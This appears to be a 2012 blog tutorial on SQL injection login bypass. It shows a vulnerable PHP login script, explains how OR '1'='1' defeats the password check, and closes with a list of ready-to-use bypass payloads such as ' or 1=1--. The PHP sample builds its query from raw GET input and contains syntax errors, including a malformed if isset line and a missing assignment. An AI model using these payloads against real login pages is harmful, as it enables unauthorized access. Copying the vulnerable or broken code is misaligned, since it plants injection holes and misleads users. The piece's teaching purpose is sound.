Saturday, June 2, 2012

Admin Login Access

Welcome To this post, where I will discuss, how an SQL Query, gives access to the Admin Panel, in other words, the first basic SQL Injection.

By now you should be knowing how the connection works from the user-end to the Back-end Database.

   WARNING        WARNING        WARNING        WARNING        WARNING        WARNING
===================================================================================== DO NOT TRY ON WEBSITES OR ON APPLICATIONS, WHERE YOU DO NOT HAVE PERMISSION, FOR ANY ILLEGAL ISSUES NEITHER ME NOR THE CONTENTS OF THE BLOG WILL BE HELD RESPONSIBLE.

THIS IS ONLY FOR EDUCATIONAL PURPOSE.

=====================================================================================

So we have a Login page in front of us, wishing if we could get access to the Admin Panel.

We apply a simple SQL Logic and check if we get access.

Lets understand the HTML code in the users-end

<form method = "GET" action = "login.php" >
Name: <input type = "text" name = "uname" />
Password: <input type = "password" name= "pwd" />
<br />
<input type = "submit" value = "Login" name= "login" />
</form>

Which would gives us the below section:


ADMIN LOGIN PANEL

Name:    
Password:


Now Lets check a Basic PHP Script that would connect to the Back-end Database, when some value is Entered in the Name and the Password Field, and clicked on Submit.


<?php

if isset ( $_GET [ 'login' ] ) //When user clicks the submit button
{

//Connects To the Database
$con  =  mysql_connect ( "localhost", "username", "password" ) or die ( "Could Not Connect To Database" ) ;

//Building the SQL Query
$qry = " SELECT id FROM Users WHERE user = '$_GET[ "uname" ]' " . "AND password = '$_GET[ "pwd" ]' ";

//Make the Query
$getresult = mysql_query ( $qry ) ;

//Check the number of Rows returned from the Query
$rows  mysql_num_rows ( $getresult ) ;

//Validates and Returns the User
if ( $rows != 0 )
{
    header ( "Location: admin.php" ); //Redirects to admin.php
}
else
{
    die ( "Invalid Username Or Password" ); //No display if Rows returned is Null
}

}

?>

If we look at the SQL Query, its

SELECT id FROM Users
WHERE user =
AND password =

If the Username and Password returns a Row, means a Valid ID, and thus logins in, and if not, it will say, "Invalid Username Or Password"

SELECT id FROM Users
WHERE user = 'Computer'
AND password = 'Korner'

The Output will be:

"Invalid Username Or Password"

Its Obvious, because there would not be such record in the Database.

Now what If we change the Logic, with a simple SQL Query

SELECT id FROM Users
WHERE user = 'Computer'
AND password = 'Korner' OR '1' = '1'

Notice here, the logic gets changed:

SELECT id FROM Users
WHERE ( user = 'Computer' AND password = 'Korner' ) OR ( '1' = '1' )

Means Either one, if the first Query Fails, second will be executed, and the second Query is a simple Logic, 1 is always equal to 1 returning it to be a True, and thus extracting out all the rows from the records.

The $rows count will not be Zero in this case, and hence the page is redirected to the admin panel. This giving access to all the Admin Privileges.

Few More SQL Queries when appended Gives access are:

' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
1'or'1'='1

NOTE:
=======================================================================
THIS IS FOR YOUR KNOWLEDGE, DON'T BREAK ADMIN PANELS AND TRY TO PROVE YOURSELF A L33T OR ELITE HACKER, BECAUSE THIS IS THE MOST LAMEST THING ONE CAN DO. MANY K-SCRIPTERS DOES IT WITHOUT UNDERSTANDING THE LOGIC AND FEELS HAPPY. PLEASE AVOID THIS, OR AT-LEAST DON'T SPEAK SHIT ABOUT POOR SECURITY BECAUSE IF YOU ARE GIVEN A SCRIPT TO WRITE TO FILTER THIS, YOU WILL HAVE NO PLACE TO HIDE YOURSELF.
=======================================================================

"LEARN TO PROTECT!"        "LEARN TO PROTECT!"        "LEARN TO PROTECT!"

0 comments:

Post a Comment